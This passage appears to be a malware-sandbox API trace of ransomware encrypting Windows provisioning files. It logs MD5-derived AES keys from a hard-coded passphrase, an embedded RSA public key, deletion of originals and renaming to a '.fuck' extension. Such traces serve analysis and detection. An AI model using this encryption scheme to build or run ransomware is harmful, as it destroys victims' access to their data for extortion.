users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.394] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.394] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f7cc8) returned 1 [0240.397] CryptCreateHash (in: hProv=0x28f7cc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.397] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.397] CryptHashData (hHash=0x28e8638, pbData=0x28cb738, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.397] CryptDeriveKey (in: hProv=0x28f7cc8, Algid=0x6610, hBaseData=0x28e8638, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e6cf8) returned 1 [0240.397] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.397] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.397] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f8108) returned 1 [0240.399] CryptImportPublicKeyInfo (in: hCryptProv=0x28f8108, dwCertEncodingType=0x1, pInfo=0x29084d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2908508*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2908510*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e6f38) returned 1 [0240.399] CryptEncrypt (in: hKey=0x28e6f38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.399] CryptEncrypt (in: hKey=0x28e6f38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f7118*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f7118*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.399] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f7118, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.399] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.399] CryptEncrypt (in: hKey=0x28e6cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.399] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.400] CloseHandle (hObject=0xffffffff) returned 1 [0240.400] CloseHandle (hObject=0xffffffff) returned 1 [0240.400] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0240.400] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0240.401] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0240.401] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0240.401] CryptDestroyHash (hHash=0x28e8638) returned 1 [0240.401] CryptDestroyKey (hKey=0x28e6cf8) returned 1 [0240.402] CryptReleaseContext (hProv=0x28f7cc8, dwFlags=0x0) returned 1 [0240.402] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.402] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.402] GetLastError () returned 0x5 [0240.402] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml")) returned 0x20 [0240.402] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x80) returned 0 [0240.402] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.403] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.403] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.403] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f71a0) returned 1 [0240.405] CryptCreateHash (in: hProv=0x28f71a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.405] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.405] CryptHashData (hHash=0x28e6cb8, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.405] CryptDeriveKey (in: hProv=0x28f71a0, Algid=0x6610, hBaseData=0x28e6cb8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e71f8) returned 1 [0240.405] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.405] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.405] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f7228) returned 1 [0240.406] CryptImportPublicKeyInfo (in: hCryptProv=0x28f7228, dwCertEncodingType=0x1, pInfo=0x2907f28*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2907f58*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2907f60*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e7278) returned 1 [0240.406] CryptEncrypt (in: hKey=0x28e7278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.406] CryptEncrypt (in: hKey=0x28e7278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f76f0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f76f0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.406] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f76f0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.406] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.406] CryptEncrypt (in: hKey=0x28e71f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.406] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.406] CloseHandle (hObject=0xffffffff) returned 1 [0240.406] CloseHandle (hObject=0xffffffff) returned 1 [0240.406] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml"), bFailIfExists=0) returned 0 [0240.407] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x0) returned 0 [0240.407] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml.gsg")) returned 0 [0240.407] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml.fuck")) returned 0 [0240.408] CryptDestroyHash (hHash=0x28e6cb8) returned 1 [0240.408] CryptDestroyKey (hKey=0x28e71f8) returned 1 [0240.408] CryptReleaseContext (hProv=0x28f71a0, dwFlags=0x0) returned 1 [0240.408] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.408] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.408] GetLastError () returned 0x5 [0240.408] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml")) returned 0x20 [0240.408] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml", dwFileAttributes=0x80) returned 0 [0240.409] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.409] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.409] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.409] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f7800) returned 1 [0240.411] CryptCreateHash (in: hProv=0x28f7800, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.411] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.411] CryptHashData (hHash=0x28e72b8, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.411] CryptDeriveKey (in: hProv=0x28f7800, Algid=0x6610, hBaseData=0x28e72b8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e6f78) returned 1 [0240.411] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.411] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.411] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f7dd8) returned 1 [0240.412] CryptImportPublicKeyInfo (in: hCryptProv=0x28f7dd8, dwCertEncodingType=0x1, pInfo=0x2908818*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2908848*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2908850*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e6df8) returned 1 [0240.412] CryptEncrypt (in: hKey=0x28e6df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.412] CryptEncrypt (in: hKey=0x28e6df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f7a20*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f7a20*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.412] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f7a20, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.412] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.412] CryptEncrypt (in: hKey=0x28e6f78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.412] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.412] CloseHandle (hObject=0xffffffff) returned 1 [0240.413] CloseHandle (hObject=0xffffffff) returned 1 [0240.413] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml"), bFailIfExists=0) returned 0 [0240.413] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml", dwFileAttributes=0x0) returned 0 [0240.413] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml.gsg")) returned 0 [0240.414] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml.fuck")) returned 0 [0240.414] CryptDestroyHash (hHash=0x28e72b8) returned 1 [0240.414] CryptDestroyKey (hKey=0x28e6f78) returned 1 [0240.414] CryptReleaseContext (hProv=0x28f7800, dwFlags=0x0) returned 1 [0240.414] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.414] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.414] GetLastError () returned 0x5 [0240.414] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml")) returned 0x20 [0240.414] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml", dwFileAttributes=0x80) returned 0 [0240.415] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.415] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.415] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.416] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f7338) returned 1 [0240.418] CryptCreateHash (in: hProv=0x28f7338, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.418] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.418] CryptHashData (hHash=0x28e6f78, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.418] CryptDeriveKey (in: hProv=0x28f7338, Algid=0x6610, hBaseData=0x28e6f78, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e6db8) returned 1 [0240.418] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.418] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.418] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f7e60) returned 1 [0240.419] CryptImportPublicKeyInfo (in: hCryptProv=0x28f7e60, dwCertEncodingType=0x1, 